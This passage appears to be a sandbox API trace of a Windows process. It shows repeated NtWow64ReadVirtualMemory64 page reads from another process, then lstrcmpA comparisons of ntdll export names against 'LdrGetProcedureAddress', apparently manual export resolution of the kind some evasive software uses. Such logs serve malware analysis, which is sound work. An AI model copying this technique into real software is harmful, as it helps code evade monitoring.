returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.706] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.707] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.708] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.708] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.708] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.708] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.708] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.709] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.710] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.711] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.711] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.711] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.712] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.713] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.717] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.717] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.717] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.717] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.718] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.719] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.720] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee466000, Buffer=0x7ff8, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee467000, Buffer=0x7ff8, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee468000, Buffer=0x7ff8, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.721] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee469000, Buffer=0x7ff8, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46a000, Buffer=0x7ff8, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46b000, Buffer=0x7ff8, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46c000, Buffer=0x7ff8, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46d000, Buffer=0x7ff8, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46e000, Buffer=0x7ff8, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee46f000, Buffer=0x7ff8, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.722] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee470000, Buffer=0x7ff8, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee471000, Buffer=0x7ff8, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee472000, Buffer=0x7ff8, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee473000, Buffer=0x7ff8, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee474000, Buffer=0x7ff8, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee475000, Buffer=0x7ff8, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee476000, Buffer=0x7ff8, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.723] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee477000, Buffer=0x7ff8, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.724] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee478000, Buffer=0x7ff8, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.750] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0077.750] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgPrint", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA 